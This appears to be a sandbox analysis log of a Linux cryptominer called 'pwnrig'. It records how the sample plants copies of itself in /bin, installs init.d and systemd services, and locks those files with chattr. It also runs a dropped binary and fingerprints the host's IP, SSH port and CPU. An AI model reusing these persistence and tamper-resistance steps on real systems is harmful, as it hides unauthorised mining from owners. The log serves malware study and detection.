/usr/local/sbin/systemctlsystemctl daemon-reload4⤵PID:3724
/usr/local/bin/systemctlsystemctl daemon-reload4⤵PID:3724
/usr/sbin/systemctlsystemctl daemon-reload4⤵PID:3724
/usr/bin/systemctlsystemctl daemon-reload4⤵PID:3724
/sbin/systemctlsystemctl daemon-reload4⤵PID:3724
/bin/systemctlsystemctl daemon-reload4⤵PID:3724
/usr/sbin/update-rc.dupdate-rc.d -f pwnrig remove3⤵PID:3745
/usr/local/sbin/systemctlsystemctl daemon-reload4⤵PID:3746
/usr/local/bin/systemctlsystemctl daemon-reload4⤵PID:3746
/usr/sbin/systemctlsystemctl daemon-reload4⤵PID:3746
/usr/bin/systemctlsystemctl daemon-reload4⤵PID:3746
/sbin/systemctlsystemctl daemon-reload4⤵PID:3746
/bin/systemctlsystemctl daemon-reload4⤵PID:3746
/bin/rmrm -rf /bin/initdr3⤵PID:3767
/bin/cpcp -f -r -- /tmp/service-agent /bin/initdr3⤵
- Writes file to system bin folder
/usr/bin/teetee /etc/init.d/pwnrig3⤵
- Modifies init.d
/bin/sedsed -i "1 s/-e //" /etc/init.d/pwnrig3⤵
- Modifies init.d
/bin/chmodchmod +x /etc/init.d/pwnrig /bin/initdr3⤵PID:3772
/usr/sbin/update-rc.dupdate-rc.d pwnrig defaults3⤵PID:3773
/usr/local/sbin/systemctlsystemctl daemon-reload4⤵PID:3774
/usr/local/bin/systemctlsystemctl daemon-reload4⤵PID:3774
/usr/sbin/systemctlsystemctl daemon-reload4⤵PID:3774
/usr/bin/systemctlsystemctl daemon-reload4⤵PID:3774
/sbin/systemctlsystemctl daemon-reload4⤵PID:3774
/bin/systemctlsystemctl daemon-reload4⤵PID:3774
/usr/sbin/update-rc.dupdate-rc.d pwnrig enable3⤵PID:3795
/usr/local/sbin/systemctlsystemctl daemon-reload4⤵PID:3796
/usr/local/bin/systemctlsystemctl daemon-reload4⤵PID:3796
/usr/sbin/systemctlsystemctl daemon-reload4⤵PID:3796
/usr/bin/systemctlsystemctl daemon-reload4⤵PID:3796
/sbin/systemctlsystemctl daemon-reload4⤵PID:3796
/bin/systemctlsystemctl daemon-reload4⤵PID:3796
/usr/bin/chattrchattr +i +a /etc/init.d/pwnrig /bin/initdr3⤵PID:3817
/usr/bin/whichwhich systemctl3⤵PID:3818
/usr/bin/chattrchattr -i -a /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service /bin/sysdr3⤵PID:3819
/bin/rmrm -rf /bin/sysdr3⤵PID:3820
/bin/cpcp -f -r -- /tmp/service-agent /bin/sysdr3⤵
- Writes file to system bin folder
/usr/bin/teetee /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service3⤵
- Modifies systemd
/bin/sedsed -i "1 s/-e //" /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service3⤵PID:3824
/usr/bin/chattrchattr +i +a /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service /bin/sysdr3⤵PID:3825
/bin/systemctlsystemctl enable pwnrige.service3⤵PID:3826
/bin/systemctlsystemctl enable pwnrigl.service3⤵PID:3847
/bin/systemctlsystemctl daemon-reload3⤵PID:3868
/bin/systemctlsystemctl reload-or-restart pwnrige.service3⤵PID:3889
/bin/hostnamehostname -I1⤵PID:3667
/usr/bin/awkawk "{print \$1}"1⤵PID:3669
/bin/catcat /etc/ssh/sshd_config1⤵PID:3671
/bin/grepgrep "Port "1⤵PID:3672
/usr/bin/awkawk "{print \"-\"\$2}"1⤵PID:3674
/usr/bin/headhead -n 11⤵PID:3673
/bin/sedsed -e "s/\$//"1⤵PID:3683
/bin/sedsed -e "s/^ *//"1⤵PID:3682
/usr/bin/cutcut -d: -f21⤵PID:3681
/bin/grepgrep -m 1 "model name" /proc/cpuinfo1⤵
- Checks CPU configuration
/usr/bin/awkawk "{print \$1}"1⤵PID:3686
/usr/bin/awkawk "{print \$4}"1⤵PID:3689
/usr/bin/awkawk "{print \$4}"1⤵PID:3692
/tmp/service-agent/tmp/service-agent -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d1⤵
- Executes dropped EXE
- Checks CPU configuration
- Checks hardware identifiers (DMI)
- Reads CPU attributes
- Reads hardware information
- Enumerates kernel/hardware configuration
- Writes file to tmp directory
PID:3931 -
/bin/shsh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""2⤵PID:3955
/bin/hostnamehostname -I1⤵PID:3958
/usr/bin/awkawk "{print \$1}"1⤵PID:3960
MITRE ATT&CK Enterprise v15
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